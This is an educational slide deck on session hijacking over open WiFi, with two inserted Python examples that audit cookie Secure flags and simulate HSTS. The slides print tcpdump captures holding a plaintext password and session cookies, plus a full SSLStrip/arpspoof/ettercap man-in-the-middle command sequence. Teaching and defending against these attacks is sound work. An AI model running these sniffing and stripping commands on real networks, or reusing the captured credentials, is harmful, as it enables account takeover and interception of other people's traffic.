Session hijacking for dummies
1
Session hijacking for dummies
Friedemann Wulff-Woesten, WDCM Dresden
2
What is this all about?
• especially in the Czech Republic: unencrypted WiFi everywhere
• Facebook: for many people THE platform to communicate
• many mobile devices have Facebook apps: even more data = more possibilities to attack
• problem: almost no one types https://, the browser always connects to port 80
3
What is this all about?
• this is a serious security threat
• tools are freely available, no one cares
• Facebook ignores the problem
• Google went Full SSL
4
HTTP is stateless
• Request, Response
• Send username/password once
• Receive cookie
• Use cookie for all future requests
5
Cookies need to be kept secret
6
7
8
even better: WiFi
• Cookies shouted through the air
• Someone just has to start listening
imac:~ eisenrah$ sudo tcpdump -A -v -i en1 tcp port 80
tcpdump: listening on en1, link-type EN10MB (Ethernet), capture size 65535 bytes
[...]
17:01:36.119066 IP (tos 0x0, ttl 64, id 45430, offset 0, flags [DF], proto TCP (6), length 102) imac.52070 > w9e.rzone.de.http: Flags [P.], cksum 0x3e95 (correct), seq 854:904, ack 1, win 33120, options [nop,nop,TS val 709324897 ecr 1167316720], length 50E..f.v@[email protected])!y....`>......*GpaE...username=wdcmdd&password=meinsogeheimespasswort
[...]
9
let’s listen...
POST /login.php?login_attempt=1 HTTP/1.1
Host: login.facebook.com
[email protected]&pass=ichmagdietu
10
Example: Request
HTTP/1.1 302 Found
Location: http://www.facebook.com/home.php?
Set-Cookie: xs=a1cac26e11645bca984ea98f98a6a19c; path=/; domain=.facebook.com; httponly
11
Example: Response
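The response above sets the session cookie with httponly but without the Secure attribute, which is exactly why the slide on port 80 matters: a browser will attach such a cookie to any plain http:// request that matches the cookie's domain and path. The following is an added example, not code from the talk: a small audit that parses Set-Cookie headers the way a browser does and reports which cookies would leave the machine in the clear. The header values and hosts are constructed placeholders (the token is not a real session id).

```python
"""Audit Set-Cookie headers for session cookies a browser would also send
over plain HTTP.  Added example, not from the original talk; the cookie
values below are constructed placeholders."""
from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass
class Cookie:
    name: str
    value: str
    domain: str          # host (or domain suffix) the cookie applies to
    host_only: bool      # True when the header carried no Domain attribute
    path: str = "/"
    secure: bool = False
    httponly: bool = False


def parse_set_cookie(header: str, request_host: str) -> Cookie:
    """Parse one Set-Cookie header value, e.g.
    'xs=...; path=/; domain=.facebook.com; httponly'.
    request_host is the host that sent the header (needed for host-only cookies)."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    cookie = Cookie(name=name.strip(), value=value.strip(),
                    domain=request_host.lower(), host_only=True)
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key, val = key.strip().lower(), val.strip()
        if key == "domain" and val:
            cookie.domain = val.lstrip(".").lower()   # leading dot is ignored
            cookie.host_only = False
        elif key == "path" and val.startswith("/"):
            cookie.path = val
        elif key == "secure":
            cookie.secure = True
        elif key == "httponly":
            cookie.httponly = True
    return cookie


def would_be_sent(cookie: Cookie, url: str) -> bool:
    """Approximate the RFC 6265 send rules: domain match, path match, and
    the Secure attribute, which restricts the cookie to https:// requests."""
    u = urlsplit(url)
    host = (u.hostname or "").lower()
    path = u.path or "/"
    if cookie.host_only:
        domain_ok = host == cookie.domain
    else:
        domain_ok = host == cookie.domain or host.endswith("." + cookie.domain)
    path_ok = path == cookie.path or path.startswith(cookie.path.rstrip("/") + "/")
    scheme_ok = u.scheme == "https" or not cookie.secure
    return domain_ok and path_ok and scheme_ok


def audit(set_cookie_headers, request_host: str, probe_url: str) -> list:
    """Names of the cookies that a browser would attach to probe_url."""
    leaking = []
    for header in set_cookie_headers:
        cookie = parse_set_cookie(header, request_host)
        if would_be_sent(cookie, probe_url):
            leaking.append(cookie.name)
    return leaking


# Constructed sample: the same shape as the login response in the talk, with a
# placeholder token, next to a sibling cookie that carries the Secure attribute.
SAMPLE_HEADERS = [
    "xs=EXAMPLE_SESSION_TOKEN; path=/; domain=.facebook.com; httponly",
    "xs_ok=EXAMPLE_SESSION_TOKEN; path=/; domain=.facebook.com; secure; httponly",
]

if __name__ == "__main__":
    for url in ("http://www.facebook.com/home.php", "https://www.facebook.com/home.php"):
        print(url, "->", audit(SAMPLE_HEADERS, "login.facebook.com", url))
```

Run against the sample, the audit reports only `xs` for the http:// probe and both cookies for the https:// one: the Secure attribute is the single difference between a session that survives an open WiFi and one that does not, and it is something a site operator can verify from its own response headers without any capture tooling.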
12
Problem: AJAX: session cookies are generated and sent without clicking anywhere
17:18:32.656064 IP (tos 0x0, ttl 64, id 7684, offset 0, flags [DF], proto TCP (6), length 674) imac.52256 > srv64-131.vkontakte.ru.http: Flags [P.], cksum 0x84a6 (correct), seq 930:1552, ack 743, win 65535, options [nop,nop,TS val 710338737 ecr 2377981922], length 622
E.....@.@..[....W..@. .P*......d...........*V......
POST /im915 HTTP/1.1
Host: q63.queue.vk.com
Connection: keep-alive
Referer: http://q63.queue.vk.com/q_frame.php?3
Content-Length: 307
Origin: http://q63.queue.vk.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: remixchk=5; remixlang=0; remixsid=2a72ff88d120569ae115f1e01885c5f14674dab175a1fb5392441d4e9840
13
tcpdump: В Контакте
21:39:06.513002 IP (tos 0x0, ttl 64, id 35287, offset 0, flags [DF], proto TCP (6), length 1306) imac.50781 > channel2-02-01-snc4.facebook.com.http: Flags [P.], cksum 0xca09 (correct), seq 1:1255, ack 263, win 32830, options [nop,nop,TS val 689948758 ecr 2100724491], length 1254
E.....@[email protected]@....B..$.].P..!p.......>. .....)..V}6..
GET /x/4057007781/1328384618/true/p_100001070666929=23 HTTP/1.1
Host: 0.44.channel.facebook.com
Connection: keep-alive
Referer: http://0.44.channel.facebook.com/iframe/11?r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyX%2Fr%2Fimb8Z50C5TH.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyF%2Fr%2Fx3LLBUl8mEP.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyH%2Fr%2FwtfO3BqjZSC.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fyz%2Fr%2FhFfiXiUF_l3.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyE%2Fr%2FSp2IUK7A8Z2.js
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_user=100001070666929; datr=-J0UTvLh4Us6mmd4HoAFaYWl; L=2; lu=Rg43lZE4nMjM3vtnDl9S-BPw; sct=1312918035; xs=60%3A8a0d1e5b0344cca655fd1566026f513c; p=44; act=1312918349733%2F16; presence=EM312918690L44REp_5f1B01070666929F23X312918690038Y1312918638OQ0EsF0CEblFDacF19G312918689PEuoFD1B01609907228FDexpF1312918709806EflF_5b1_5dEolF0CE1B00195332181FDexpF13129187B69EflF_5b_5dEolF-1CCEalFD1B01609907228FDiF0EmF0CCCC; wd=840x952
14
tcpdump: Facebook
15
facebook.js changes
16
What can you do?
• always full SSL: type https:// in the address bar
• click "Log out" (doesn't guarantee the session is invalidated)
• use at least WPA2
• use a VPN, e.g. https://webvpn.zih.tu-dresden.de/
17
Even worse
• Facebook Like button, Tweet buttons (included in many blogs; cookies sent with HTTP)
• dirty: active attack with SSLStrip (redirects every HTTPS request to HTTP)
sudo -s
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
sslstrip -l 1000
ip route show | grep default | awk '{ print $3}'
arpspoof <gatewayIP>
ettercap -Tzq
18
Example: SSLStrip
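The "What can you do?" list is entirely on the user's side. The server-side counterpart, which also answers the SSLStrip slide, is HTTP Strict Transport Security: once a browser has seen the header over HTTPS it rewrites later http:// URLs to https:// locally, before any packet leaves the machine, so a proxy sitting on port 80 never gets a plaintext request to strip. The following is an added example, not code from the talk or from any of the tools named on it: a tiny origin that refuses to hand out session cookies over HTTP, and a minimal client that honours HSTS, with a counter for what a sniffer on port 80 would see. The host name, max-age and cookie value are constructed.

```python
"""Simulate HSTS end to end: an origin that only issues Secure session cookies
over HTTPS, and a client that remembers the policy.  Added example, not from
the talk; host name, max-age and token are constructed placeholders."""
from urllib.parse import urlsplit, urlunsplit

HSTS_MAX_AGE = 31536000  # one year, in seconds (constructed value)


def server_response(url: str) -> dict:
    """Headers the origin returns for a request to `url`.

    Plain HTTP gets a redirect and never a session cookie; HTTPS gets the
    HSTS policy plus a cookie carrying Secure and HttpOnly, so the cookie
    cannot be replayed over port 80 and is not readable from page scripts."""
    u = urlsplit(url)
    if u.scheme != "https":
        return {"status": 301,
                "Location": urlunsplit(("https", u.netloc, u.path, u.query, ""))}
    return {
        "status": 200,
        "Strict-Transport-Security": f"max-age={HSTS_MAX_AGE}; includeSubDomains",
        "Set-Cookie": "session=EXAMPLE_TOKEN; Path=/; Secure; HttpOnly; SameSite=Lax",
    }


class Browser:
    """Minimal client: follows redirects and applies HSTS for known hosts."""

    def __init__(self):
        self.hsts_hosts = set()
        self.plaintext_requests = []   # every URL that went out over port 80

    def _hsts_applies(self, host: str) -> bool:
        # includeSubDomains: the policy covers the host and everything under it
        return any(host == h or host.endswith("." + h) for h in self.hsts_hosts)

    def _send(self, url: str) -> dict:
        if urlsplit(url).scheme == "http":
            self.plaintext_requests.append(url)   # this is what a sniffer sees
        return server_response(url)

    def navigate(self, url: str) -> dict:
        u = urlsplit(url)
        if u.scheme == "http" and self._hsts_applies(u.hostname or ""):
            # HSTS upgrade happens on the client, before anything hits the wire
            url = urlunsplit(("https", u.netloc, u.path, u.query, u.fragment))
        resp = self._send(url)
        if resp["status"] == 301:
            return self.navigate(resp["Location"])
        if "Strict-Transport-Security" in resp:
            self.hsts_hosts.add(urlsplit(url).hostname)
        return resp


def demo(host: str = "social.example") -> list:
    """Three visits typed as http://; returns the URLs that went out in clear."""
    b = Browser()
    b.navigate(f"http://{host}/home.php")    # first visit: one plaintext hop
    b.navigate(f"http://{host}/home.php")    # upgraded locally, nothing on port 80
    b.navigate(f"http://api.{host}/poll")    # subdomain covered by includeSubDomains
    return b.plaintext_requests


if __name__ == "__main__":
    print("plaintext requests seen on port 80:", demo())
```

The remaining gap is the very first visit, which still starts on port 80 before the policy is known; that is why browsers ship a preload list of hosts that are treated as HSTS from the start, and why the session cookie here is only ever issued on the HTTPS side of the redirect.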
19
http://wiki.eisenrah.com/wiki/Sessions
20
@cdine @codebutler
@eisenrah
@moxie__
21
Sources
• Elmo and Cookie Monster: http://1450knsi.com/assets/images/Elmo%20Cookie%20Monster.jpg
• Wireshark collage:
http://www.flickr.com/photos/43707902@N04/4022449442/
http://www.flickr.com/photos/43707902@N04/4022445684/
http://carlosadlrs.files.wordpress.com/2011/07/wireshark-logo.png
• Wireshark screenshot: http://dump.taylor-hughes.com/wireshark-tadalist.png
• Firesheep facebook.js screenshot: http://1.bp.blogspot.com/_BQgAZ7cjkHQ/TTbVkUVb4DI/AAAAAAAABcg/NWl1KI5PCWA/s1600/Screenshot-9.png